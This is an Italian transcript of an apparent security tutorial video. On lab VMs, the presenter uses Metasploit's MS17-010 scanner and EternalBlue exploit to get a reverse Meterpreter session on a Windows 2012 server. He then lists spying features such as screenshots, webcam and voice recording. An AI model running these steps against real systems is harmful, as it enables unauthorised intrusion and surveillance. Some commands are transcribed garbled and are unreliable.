Qualche giorno fa su Facebook, su un gruppo di Facebook, ho fatto una domanda. Ma in Italia le aziende continuano a usare Windows 2012? E le risposte sono state le più svariate. C'è chi ha detto sì, c'è chi ha detto più di quante ne credi, c'è chi ha detto Windows 2008, addirittura Windows 2003, Windows NT. Perché le aziende non investono nel software, non investono neanche nella formazione del personale. E questo è un disastro. E questo succede per mancanza della percezione del rischio. In quanto non succederà mai a me, eh va bene, quando poi succede, se succede poi vediamo. Poi una mattina ti svegli e trovi un ospedale bloccato, un comune bloccato, trovi i dati di un comune a giro su internet. Peraltro le linee del GDPR sono molto precise. Se un utente trova, un utente, una persona, trova i suoi dati, per esempio una cartella esattoriale, o una comunicazione del comune, o di un altro ente su Google, l'ente deve risarcirlo se viene presentata una denuncia. Quindi il danno è superiore all'investimento che, secondo me, un'azienda dovrebbe fare sia nel software sia nel personale. Quello che andremo a vedere oggi ti mostra come è facile entrare in un sistema. Chiaramente questo è un ambiente già preparato, quindi è più facile. Ma questo non vuol dire che allora nella realtà non lo sia. Nel video qui sopra vedrai come si crea il collegamento tra una macchina Windows, per esempio 10, e il computer del malintenzionato. Unendo poi una serie di tecniche, è facile ingannare un utente. E non sto qui a spiegarti come, però è molto facile. Piccolo disclaimer, quello che faremo oggi è fatto sulle mie macchine virtuali, dove ovviamente ho l'autorizzazione, e ti dico che queste cose sono a scopo di studio e istruzioni. Quindi non le devi fare su macchine che non sono di tua proprietà, o su macchine dove tu non hai l'autorizzazione iscritta del proprietario. Ti ricordo che la violazione di sistemi informatici senza l'autorizzazione è un reato punibile per legge. Quindi queste cose vanno fatte unicamente sulle proprie macchine o dove si ha l'autorizzazione. Adesso vediamo come si fa. Qui, come al solito, ho la mia macchina Kali, e qui ho la mia macchina Windows 2012 Server, aggiornata, appena installata, è tutta aggiornata. Ed eccola qui. Semplice. Adesso vediamo come poter fare. Apriamo una shell su Kali. Andiamo su root, sudo su, Kali. Poi dopo facciamo partire il nostro metasploit, console. Una volta partito, andiamo a fare una scansione. In questo caso io so già l'indirizzo IP, perché, come già detto prima, è già stato tutto preparato. Quindi con use, dove è qua? Use, scanner, smb, smb underscore ms17 underscore 010. Invio. Perché, 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 perché smb? Questo è sbagliato. Ok. Show options. Qui dice che dobbiamo impostare il remote host e lui la scansione lo fa sulla porta 445. Quindi facciamo set r host 191.204.141 che è l'IP del mio Windows Server che si trova qui. Facciamo così. Adesso digitiamo run e voilà. Ci dice subito che l'host è vulnerabile a questo tipo di attacco. Ok. Andiamo a vedere. Quindi scriviamo use, exploit, windows, smb, poi ms17 underscore 10, 010 underscore e turnar blue. Qui dobbiamo scrivere show options e vediamo che cosa dobbiamo impostare. Fatemi un attimo fare questa cosa. Così forse si vede meglio. Allora, prima cosa, set local port e andiamo a scrivere 44444 44444 perché è la porta dove Metasploit è in listening. Poi set local localhost quindi mi serve di sapere l'indirizzo IP di questa macchina qui che è questo 135 paste poi posso fare run show options mi sono dimenticato qualcosa il lost e remoto options local port quindi set air host 192 168 204 punto 141 ok run e siamo dentro diamogli un attimo che finisce sessione aperta con la macchina quindi remota diamogli un attimo di tempo ed eccoci qua no sys guardiamo un po' sysinfo siamo dentro siamo dentro ha dato questo errore ma siamo dentro e come vedi sysinfo siamo dentro a windows 2012 r2 quindi non siamo proprio sicuri di essere sicuri se io scrivo shell per esempio dir slash ed eccolo qui qui ci sono i vari file di windows chiaramente però poi posso anche volendo users vedere vedere che tipi di utenti ci sono in questo server in questo caso l'utente xxx e poi public poi con exit se io qui scrivo help qui vedi che ho dei vari comandi che possono essermi utili per esempio posso bloccare dei processi o chiuderli eccetera eccetera prendere screenshot poi c'è anche la telecamera però chiaramente su un server la telecamera non c'è posso se è su un computer posso registrare la voce posso prendere screenshot o posso condividere il desktop quindi in questo caso lo condividi con me oppure posso collegarmi con il desktop remoto ci sono molte opzioni quindi come abbiamo visto non non so se sei sicuro di essere sicuro quindi bisogna sempre porre attenzione alla sicurezza detto questo io vi ringrazio di aver guardato questo video se ti è piaciuto lascia un mi piace se non sei iscritto al canale iscriviti al canale di aver guardato lo Grazie a tutti.